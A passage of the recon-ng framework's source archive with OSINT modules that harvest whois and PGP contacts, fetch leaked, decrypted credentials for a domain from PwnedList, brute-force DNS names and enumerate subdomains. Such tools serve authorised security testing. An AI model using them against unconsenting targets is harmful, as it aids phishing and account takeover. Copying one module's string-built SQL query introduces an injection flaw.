match.group(1, 2)])) results = list(set(results)) if not results: self.output('No results found.') continue for contact in results: name = contact[0].strip() fname, mname, lname = self.parse_name(name) email = contact[1] if email.lower().endswith(domain.lower()): self.add_contacts(first_name=fname, middle_name=mname, last_name=lname, email=email, title='PGP key association') ��������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-contacts/whois_pocs.py����������������������0000664�0000000�0000000�00000004307�13122657244�0026733�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from urlparse import urlparse class Module(BaseModule): meta = { 'name': 'Whois POC Harvester', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Uses the ARIN Whois RWS to harvest POC data from whois queries for the given domain. Updates the \'contacts\' table with the results.', 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): headers = {'Accept': 'application/json'} for domain in domains: self.heading(domain, level=0) url = 'http://whois.arin.net/rest/pocs;domain=%s' % (domain) self.verbose('URL: %s' % url) resp = self.request(url, headers=headers) if 'Your search did not yield any results.' in resp.text: self.output('No contacts found.') continue handles = [x['@handle'] for x in resp.json['pocs']['pocRef']] if type(resp.json['pocs']['pocRef']) == list else [resp.json['pocs']['pocRef']['@handle']] for handle in handles: url = 'http://whois.arin.net/rest/poc/%s' % (handle) self.verbose('URL: %s' % url) resp = self.request(url, headers=headers) poc = resp.json['poc'] emails = poc['emails']['email'] if type(poc['emails']['email']) == list else [poc['emails']['email']] for email in emails: fname = poc['firstName']['$'] if 'firstName' in poc else None lname = poc['lastName']['$'] name = ' '.join([x for x in [fname, lname] if x]) email = email['$'] title = 'Whois contact' city = poc['city']['$'].title() state = poc['iso3166-2']['$'].upper() if 'iso3166-2' in poc else None region = ', '.join([x for x in [city, state] if x]) country = poc['iso3166-1']['name']['$'].title() if email.lower().endswith(domain.lower()): self.add_contacts(first_name=fname, last_name=lname, email=email, title=title, region=region, country=country) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-credentials/��������������������������������0000775�0000000�0000000�00000000000�13122657244�0024657�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-credentials/pwnedlist/����������������������0000775�0000000�0000000�00000000000�13122657244�0026670�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-credentials/pwnedlist/account_creds.py������0000664�0000000�0000000�00000003764�13122657244�0032070�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.utils.crypto import aes_decrypt class Module(BaseModule): meta = { 'name': 'PwnedList - Account Credentials Fetcher', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Queries the PwnedList API for credentials associated with the given usernames. Updates the \'credentials\' table with the results.', 'required_keys': ['pwnedlist_api', 'pwnedlist_secret', 'pwnedlist_iv'], 'comments': ( 'API Query Cost: 1 query per request and 1 query per unique leak.', ), 'query': 'SELECT DISTINCT username FROM credentials WHERE username IS NOT NULL and password IS NULL', } def module_run(self, accounts): key = self.keys.get('pwnedlist_api') secret = self.keys.get('pwnedlist_secret') decrypt_key = secret[:16] iv = self.keys.get('pwnedlist_iv') # setup the API call url = 'https://api.pwnedlist.com/api/1/accounts/query' # build the payload payload = {'account_identifier': ','.join(accounts), 'daysAgo': 0} payload = self.build_pwnedlist_payload(payload, 'accounts.query', key, secret) # make the request resp = self.request(url, payload=payload) if resp.json: jsonobj = resp.json else: self.error('Invalid JSON response.\n%s' % (resp.text)) return if len(jsonobj['results']) == 0: self.output('No results returned.') else: # extract the credentials for cred in jsonobj['results']: username = cred['plain'] password = aes_decrypt(cred['password'], decrypt_key, iv) leak = cred['leak_id'] self.add_credentials(username=username, password=password, leak=leak) self.add_leaks(mute=True, **self.get_pwnedlist_leak(leak)) self.query('DELETE FROM credentials WHERE username = \'%s\' and password IS NULL and hash IS NULL' % (username)) ������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-credentials/pwnedlist/api_usage.py����������0000664�0000000�0000000�00000002245�13122657244�0031202�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule class Module(BaseModule): meta = { 'name': 'PwnedList - API Usage Statistics Fetcher', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Queries the PwnedList API for account usage statistics.', 'required_keys': ['pwnedlist_api', 'pwnedlist_secret'], } def module_run(self): key = self.keys.get('pwnedlist_api') secret = self.keys.get('pwnedlist_secret') # setup the API call url = 'https://api.pwnedlist.com/api/1/usage/info' payload = {} payload = self.build_pwnedlist_payload(payload, 'usage.info', key, secret) # make the request resp = self.request(url, payload=payload) if resp.json: jsonobj = resp.json else: self.error('Invalid JSON response.\n%s' % (resp.text)) return # handle the output total = jsonobj['num_queries_allotted'] left = jsonobj['num_queries_left'] self.output('Queries allotted: %s' % (str(total))) self.output('Queries remaining: %s' % (str(left))) self.output('Queries used: %s' % (str(total-left))) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-credentials/pwnedlist/domain_creds.py�������0000664�0000000�0000000�00000004456�13122657244�0031702�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.utils.crypto import aes_decrypt class Module(BaseModule): meta = { 'name': 'PwnedList - Pwned Domain Credentials Fetcher', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Queries the PwnedList API to fetch all credentials for a domain. Updates the \'credentials\' table with the results.', 'required_keys': ['pwnedlist_api', 'pwnedlist_secret', 'pwnedlist_iv'], 'comments': ( 'API Query Cost: 10,000 queries per request, 1 query for each account returned, and 1 query per unique leak.', ), 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): key = self.keys.get('pwnedlist_api') secret = self.keys.get('pwnedlist_secret') decrypt_key = secret[:16] iv = self.keys.get('pwnedlist_iv') # setup the API call url = 'https://api.pwnedlist.com/api/1/domains/query' for domain in domains: self.heading(domain, level=0) payload = {'domain_identifier': domain, 'daysAgo': 0} while True: # build the payload pwnedlist_payload = self.build_pwnedlist_payload(payload, 'domains.query', key, secret) # make the request resp = self.request(url, payload=pwnedlist_payload) if resp.json: jsonobj = resp.json else: self.error('Invalid JSON response for \'%s\'.\n%s' % (domain, resp.text)) break if len(jsonobj['accounts']) == 0: self.output('No results returned for \'%s\'.' % (domain)) break # extract the credentials for cred in jsonobj['accounts']: username = cred['plain'] password = aes_decrypt(cred['password'], decrypt_key, iv) leak = cred['leak_id'] self.add_credentials(username=username, password=password, leak=leak) self.add_leaks(mute=True, **self.get_pwnedlist_leak(leak)) # paginate if jsonobj['token']: payload['token'] = jsonobj['token'] continue break ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-credentials/pwnedlist/domain_ispwned.py�����0000664�0000000�0000000�00000003772�13122657244�0032253�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule class Module(BaseModule): meta = { 'name': 'PwnedList - Pwned Domain Statistics Fetcher', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Queries the PwnedList API for a domain to determine if any associated credentials have been compromised. This module does NOT return any credentials, only a total number of compromised credentials.', 'required_keys': ['pwnedlist_api', 'pwnedlist_secret'], 'comments': ( 'API Query Cost: 1 query per request.', ), 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): key = self.keys.get('pwnedlist_api') secret = self.keys.get('pwnedlist_secret') tdata = [] # setup the API call url = 'https://api.pwnedlist.com/api/1/domains/info' for domain in domains: payload = {'domain_identifier': domain} payload = self.build_pwnedlist_payload(payload, 'domains.info', key, secret) # make the request resp = self.request(url, payload=payload) jsonobj = resp.json # compare to None to confirm valid json as empty json is returned when domain not found if jsonobj is None: self.error('Invalid JSON response for \'%s\'.\n%s' % (domain, resp.text)) continue # check for a positive response if not jsonobj['num_entries']: self.verbose('Domain \'%s\' has no publicly compromised accounts.' % (domain)) continue # handle the output self.alert('Domain \'%s\' has publicly compromised accounts!' % (domain)) tdata.append([jsonobj['domain'], str(jsonobj['num_entries']), jsonobj['first_seen'], jsonobj['last_seen']]) if tdata: header = ['Domain', 'Pwned_Accounts', 'First_Seen', 'Last_Seen'] self.table(tdata, header=header, title='Compromised Domains') ������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-credentials/pwnedlist/leak_lookup.py��������0000664�0000000�0000000�00000002064�13122657244�0031551�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule class Module(BaseModule): meta = { 'name': 'PwnedList - Leak Details Fetcher', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Queries the local database for information associated with a leak ID. The \'leaks_dump\' module must be used to populate the local database before this module will execute successfully.', 'query': 'SELECT DISTINCT leak FROM credentials WHERE leak IS NOT NULL', } def module_run(self, leak_ids): self.output(self.ruler*50) columns = [x[1] for x in self.query('PRAGMA table_info(leaks)')] for leak_id in leak_ids: values = self.query('SELECT "%s" FROM leaks WHERE leak_id=?' % ('", "'.join(columns)), (leak_id,)) if not values: self.error('Invalid leak ID.') continue for i in range(0,len(columns)): title = ' '.join(columns[i].split('_')).title() self.output('%s: %s' % (title, values[0][i])) self.output(self.ruler*50) ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-credentials/pwnedlist/leaks_dump.py���������0000664�0000000�0000000�00000001250�13122657244�0031364�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule class Module(BaseModule): meta = { 'name': 'PwnedList - Leak Details Retriever', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Queries the PwnedList API for information associated with all known leaks. Updates the \'leaks\' table with the results.', 'required_keys': ['pwnedlist_api', 'pwnedlist_secret'], 'comments': ( 'API Query Cost: 1 query per request.', ), 'query': 'SELECT DISTINCT leak_id FROM leaks WHERE leak_id IS NOT NULL', } def module_run(self, leak_ids): for leak_id in leak_ids: self.get_pwnedlist_leak(leak_id) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-domains/������������������������������������0000775�0000000�0000000�00000000000�13122657244�0024014�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-domains/brute_suffix.py���������������������0000664�0000000�0000000�00000004574�13122657244�0027105�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.mixins.resolver import ResolverMixin import dns.resolver import os class Module(BaseModule, ResolverMixin): meta = { 'name': 'DNS Public Suffix Brute Forcer', 'author': 'Marcus Watson (@BranMacMuffin)', 'description': 'Brute forces TLDs and SLDs using DNS. Updates the \'domains\' table with the results.', 'comments': ( 'TLDs: https://data.iana.org/TLD/tlds-alpha-by-domain.txt', 'SLDs: https://raw.github.com/gavingmiller/second-level-domains/master/SLDs.csv', ), 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', 'options': ( ('suffixes', os.path.join(BaseModule.data_path, 'suffixes.txt'), True, 'path to public suffix wordlist'), ), } def module_run(self, domains): max_attempts = 3 resolver = self.get_resolver() with open(self.options['suffixes']) as fp: words = [line.strip().lower() for line in fp if len(line)>0 and line[0] is not '#'] for domain in domains: self.heading(domain, level=0) domain_root = domain.split('.')[0] for word in words: attempt = 0 while attempt < max_attempts: domain = '%s.%s' % (domain_root, word) try: answers = resolver.query(domain, 'SOA') except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.NoNameservers): self.verbose('%s => No record found.' % (domain)) except dns.resolver.Timeout: self.verbose('%s => Request timed out.' % (domain)) attempt += 1 continue else: # process answers for answer in answers.response.answer: if answer.rdtype == 6: soa = answer.name.to_text()[:-1] self.alert('%s => (SOA) %s' % (domain, soa)) # use "host" rather than "soa" as sometimes the SOA record has a CNAME self.add_domains(domain) # break out of the loop attempt = max_attempts ������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/��������������������������������������0000775�0000000�0000000�00000000000�13122657244�0023522�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/bing_domain_api.py��������������������0000664�0000000�0000000�00000004463�13122657244�0027202�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.utils.parsers import parse_hostname from urlparse import urlparse import re class Module(BaseModule): meta = { 'name': 'Bing API Hostname Enumerator', 'author': 'Marcus Watson (@BranMacMuffin)', 'description': 'Leverages the Bing API and "domain:" advanced search operator to harvest hosts. Updates the \'hosts\' table with the results.', 'required_keys': ['bing_api'], 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', 'options': ( ('limit', 0, True, 'limit total number of api requests (0 = unlimited)'), ), } def module_run(self, domains): limit = self.options['limit'] requests = 0 for domain in domains: self.heading(domain, level=0) hosts = [] results = [] pages = 1 base_query = 'domain:%s' % (domain) while not limit or requests < limit: query = base_query # build query string based on api limitations for host in hosts: omit_domain = ' -domain:%s' % (host) # https://msdn.microsoft.com/en-us/library/dn760794.aspx if len(query) + len(omit_domain) >= 1500: break query += omit_domain # make api requests if limit and requests + pages > limit: pages = limit - requests last_len = len(results) results = self.search_bing_api(query, pages) requests += pages # iterate through results and add new hosts flag = False for result in results: host = parse_hostname(result['displayUrl']) if host.endswith('.'+domain) and host not in hosts: hosts.append(host) self.add_hosts(host) flag = True if not flag and last_len == len(results): break elif not flag and last_len != len(results): pages += 1 self.verbose('No new hosts found for the current query. Increasing depth to \'%d\' pages.' % (pages)) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/bing_domain_web.py��������������������0000664�0000000�0000000�00000006043�13122657244�0027202�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from cookielib import CookieJar import urllib import re import time import random class Module(BaseModule): meta = { 'name': 'Bing Hostname Enumerator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Harvests hosts from Bing.com by using the \'site\' search operator. Updates the \'hosts\' table with the results.', 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): base_url = 'https://www.bing.com/search' for domain in domains: self.heading(domain, level=0) base_query = 'domain:' + domain pattern = '"b_algo"><h2><a href="(?:\w*://)*(\S+?)\.%s[^"]*"' % (domain) subs = [] # control variables new = True page = 0 nr = 50 cookiejar = CookieJar() cookiejar.set_cookie(self.make_cookie('SRCHHPGUSR', 'NEWWND=0&NRSLT=%d&SRCHLANG=&AS=1' % (nr), '.bing.com')) # execute search engine queries and scrape results storing subdomains in a list # loop until no new subdomains are found while new == True: content = None query = '' # build query based on results of previous results for sub in subs: query += ' -domain:%s.%s' % (sub, domain) full_query = base_query + query url = '%s?first=%d&q=%s' % (base_url, (page*nr), urllib.quote_plus(full_query)) # bing errors out at > 2059 characters not including the protocol if len(url) > 2066: url = url[:2066] self.verbose('URL: %s' % (url)) # send query to search engine resp = self.request(url, cookiejar=cookiejar) if resp.status_code != 200: self.alert('Bing has encountered an error. Please submit an issue for debugging.') break content = resp.text sites = re.findall(pattern, content) # create a unique list sites = list(set(sites)) new = False # add subdomain to list if not already exists for site in sites: if site not in subs: subs.append(site) new = True host = '%s.%s' % (site, domain) self.add_hosts(host) if not new: # exit if all subdomains have been found if not '>Next</a>' in content: break else: page += 1 self.verbose('No New Subdomains Found on the Current Page. Jumping to Result %d.' % ((page*nr)+1)) new = True # sleep script to avoid lock-out self.verbose('Sleeping to avoid lockout...') time.sleep(random.randint(5,15)) ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/brute_hosts.py������������������������0000664�0000000�0000000�00000006147�13122657244�0026445�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.mixins.resolver import ResolverMixin from recon.mixins.threads import ThreadingMixin import dns.resolver import os class Module(BaseModule, ResolverMixin, ThreadingMixin): meta = { 'name': 'DNS Hostname Brute Forcer', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Brute forces host names using DNS. Updates the \'hosts\' table with the results.', 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', 'options': ( ('wordlist', os.path.join(BaseModule.data_path, 'hostnames.txt'), True, 'path to hostname wordlist'), ), } def module_run(self, domains): with open(self.options['wordlist']) as fp: words = fp.read().split() resolver = self.get_resolver() for domain in domains: self.heading(domain, level=0) wildcard = None try: answers = resolver.query('*.%s' % (domain)) wildcard = answers.response.answer[0][0] self.output('Wildcard DNS entry found for \'%s\' at \'%s\'.' % (domain, wildcard)) except (dns.resolver.NoNameservers, dns.resolver.Timeout): self.error('Invalid nameserver.') continue except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer): self.verbose('No Wildcard DNS entry found.') self.thread(words, domain, resolver, wildcard) def module_thread(self, word, domain, resolver, wildcard): max_attempts = 3 attempt = 0 while attempt < max_attempts: host = '%s.%s' % (word, domain) try: answers = resolver.query(host) except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer): self.verbose('%s => No record found.' % (host)) except dns.resolver.Timeout: self.verbose('%s => Request timed out.' % (host)) attempt += 1 continue else: # process answers if answers.response.answer[0][0] == wildcard: self.verbose('%s => Response matches the wildcard.' % (host)) else: for answer in answers.response.answer: for rdata in answer: if rdata.rdtype in (1, 5): if rdata.rdtype == 1: address = rdata.address self.alert('%s => (A) %s' % (host, address)) self.add_hosts(host, address) if rdata.rdtype == 5: cname = rdata.target.to_text()[:-1] self.alert('%s => (CNAME) %s' % (host, cname)) self.add_hosts(cname) # add the host in case a CNAME exists without an A record self.add_hosts(host) # break out of the loop attempt = max_attempts �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/builtwith.py��������������������������0000664�0000000�0000000�00000006013�13122657244�0026107�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import textwrap class Module(BaseModule): meta = { 'name': 'BuiltWith Enumerator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Leverages the BuiltWith API to identify hosts, technologies, and contacts associated with a domain.', 'required_keys': ['builtwith_api'], 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', 'options': ( ('show_all', True, True, 'display technologies'), ), } def module_run(self, domains): key = self.keys.get('builtwith_api') url = ' http://api.builtwith.com/v5/api.json' title = 'BuiltWith contact' for domain in domains: self.heading(domain, level=0) payload = {'key': key, 'lookup': domain} resp = self.request(url, payload=payload) if 'error' in resp.json: self.error(resp.json['error']) continue for result in resp.json['Results']: # extract and add emails to contacts emails = result['Meta']['Emails'] if emails is None: emails = [] for email in emails: self.add_contacts(first_name=None, last_name=None, title=title, email=email) # extract and add names to contacts names = result['Meta']['Names'] if names is None: names = [] for name in names: fname, mname, lname = self.parse_name(name['Name']) self.add_contacts(first_name=fname, middle_name=mname, last_name=lname, title=title) # extract and consolidate hosts and associated technology data data = {} for path in result['Result']['Paths']: domain = path['Domain'] subdomain = path['SubDomain'] host = subdomain if domain in subdomain else '.'.join(filter(len, [subdomain, domain])) if not host in data: data[host] = [] data[host] += path['Technologies'] for host in data: # add host to hosts # *** might domain integrity issues here *** domain = '.'.join(host.split('.')[-2:]) if domain != host: self.add_hosts(host) # process hosts and technology data if self.options['show_all']: for host in data: self.heading(host, level=0) # display technologies if data[host]: self.output(self.ruler*50) for item in data[host]: for tag in item: self.output('%s: %s' % (tag, textwrap.fill(self.to_unicode_str(item[tag]), 100, initial_indent='', subsequent_indent=self.spacer*2))) self.output(self.ruler*50) ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/certificate_transparency.py�����������0000664�0000000�0000000�00000001424�13122657244�0031150�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import json class Module(BaseModule): meta = { 'name': 'Certificiate Transparency Search', 'author': 'Rich Warren (richard.warren@nccgroup.trust)', 'description': 'Searches certificate transparency data from crt.sh, adding newly identified hosts to the hosts table.', 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): for domain in domains: self.heading(domain, level=0) resp = self.request('https://crt.sh/?q=%25.{0}&output=json'.format(domain)) fixed_raw = '[%s]' % resp.raw.replace('}{', '},{') for cert in json.loads(fixed_raw): self.add_hosts(cert.get('name_value')) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/google_site_api.py��������������������0000664�0000000�0000000�00000002460�13122657244�0027227�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from urlparse import urlparse class Module(BaseModule): meta = { 'name': 'Google CSE Hostname Enumerator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Leverages the Google Custom Search Engine API to harvest hosts using the \'site\' search operator. Updates the \'hosts\' table with the results.', 'required_keys': ['google_api', 'google_cse'], 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): for domain in domains: self.heading(domain, level=0) base_query = 'site:' + domain hosts = [] while True: query = '' # build query based on results of previous results for host in hosts: query += ' -site:%s' % (host) query = base_query + query results = self.search_google_api(query, limit=1) if not results: break for result in results: host = urlparse(result['link']).netloc if not host in hosts: hosts.append(host) # add each host to the database self.add_hosts(host) ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/google_site_web.py��������������������0000664�0000000�0000000�00000004600�13122657244�0027231�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.mixins.search import GoogleWebMixin import urllib import re class Module(BaseModule, GoogleWebMixin): meta = { 'name': 'Google Hostname Enumerator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Harvests hosts from Google.com by using the \'site\' search operator. Updates the \'hosts\' table with the results.', 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): for domain in domains: self.heading(domain, level=0) base_query = 'site:' + domain regmatch = re.compile('//([^/]*\.%s)' % (domain)) hosts = [] # control variables new = True page = 1 nr = 100 # execute search engine queries and scrape results storing subdomains in a list # loop until no new subdomains are found while new: # build query based on results of previous results query = '' for host in hosts: query += ' -site:%s' % (host) # send query to search engine results = self.search_google_web(base_query + query, limit=1, start_page=page) # extract hosts from search results sites = [] for link in results: site = regmatch.search(link) if site is not None: sites.append(site.group(1)) # create a unique list sites = list(set(sites)) # add subdomain to list if not already exists new = False for site in sites: if site not in hosts: hosts.append(site) new = True self.add_hosts(site) if not new: # exit if all subdomains have been found if not results: break else: # intelligently paginate separate from the framework to optimize the number of queries required page += 1 self.verbose('No New Subdomains Found on the Current Page. Jumping to Result %d.' % ((page*nr)+1)) new = True ��������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/hackertarget.py�����������������������0000664�0000000�0000000�00000002202�13122657244�0026534�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule class Module(BaseModule): meta = { 'name': 'HackerTarget Lookup', 'author': 'Michael Henriksen (@michenriksen)', 'description': 'Uses the HackerTarget.com API to find host names. Updates the \'hosts\' table with the results.', 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): for domain in domains: self.heading(domain, level=0) url = 'https://api.hackertarget.com/hostsearch/' payload = {'q': domain} resp = self.request(url, payload=payload) if resp.status_code is not 200: self.error('Got unexpected response code: %i' % resp.status_code) continue if resp.text == '': self.output('No results found.') continue for line in resp.text.split("\n"): line = line.strip() if line == '': continue host, address = line.split(",") self.add_hosts(host=host, ip_address=address) ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/mx_spf_ip.py��������������������������0000664�0000000�0000000�00000007267�13122657244�0026074�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.mixins.resolver import ResolverMixin import dns.resolver class Module(BaseModule, ResolverMixin): meta = { 'name': 'Mail eXchange (MX) and Sender Policy Framework (SPF) Record Retriever', 'author': 'Jim Becher (@jimbecher, jbecher@korelogic.com)', 'description': 'Retrieves the MX and SPF IPv4 records for a domain. Updates the \'hosts\' and/or \'netblocks\' tables with the results.', 'comments': ( 'This module reads domains from the domains table and retrieves the hostnames of the MX records associated with each domain. The hostnames are then stored in the hosts table. It also retrieves the IP addresses and/or netblocks of the SPF records associated with each domain. The addresses are then stored in the hosts and/or netblocks table.', ), 'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL', } def module_run(self, domains): max_attempts = 3 resolver = self.get_resolver() answers = "" for domain in domains: attempt = 0 self.verbose('Retrieving MX records for %s.' % (domain)) while attempt < max_attempts: try: answers = resolver.query(domain, 'MX') except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer): self.verbose('%s => No record found.' % (domain)) except dns.resolver.Timeout: self.verbose('%s => Request timed out.' % (domain)) attempt += 1 continue except (dns.resolver.NoNameservers): self.verbose('%s => Invalid nameserver.' % (domain)) else: for rdata in answers: host = rdata.exchange host = str(host) host = host[:-1] self.add_hosts(host) # break out of the loop attempt = max_attempts # Now look for SPF records for domain in domains: attempt = 0 self.verbose('Retrieving SPF records for %s.' % (domain)) while attempt < max_attempts: try: answers = resolver.query(domain, 'TXT') except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer): self.verbose('%s => No record found.' % (domain)) except dns.resolver.Timeout: self.verbose('%s => Request timed out.' % (domain)) attempt += 1 continue except (dns.resolver.NoNameservers): self.verbose('%s => Invalid nameserver.' % (domain)) else: for txtrecord in answers: self.verbose('TXT record: %s' % (txtrecord)) if "v=spf" in txtrecord.to_text(): resp = txtrecord.to_text() words = resp.split() for item in words: if "ip4" in item: ipaddr = item.split(':', 1)[1] if "/" in ipaddr: self.add_netblocks(ipaddr) else: self.add_hosts(ip_address=ipaddr) elif "a:" in item: spfhost = item.split(':', 1)[1] self.add_hosts(host=spfhost) # break out of the loop attempt = max_attempts �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/domains-hosts/netcraft.py���������������������������0000664�0000000�0000000�00000005420�13122657244�0025703�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.utils.requests import encode_payload from cookielib import CookieJar import urllib import re import hashlib import time import random class Module(BaseModule): meta = { 'name': 'Netcraft Hostname Enumerator', 'author': 'thrapt (thrapt@gmail.com)', 'description': 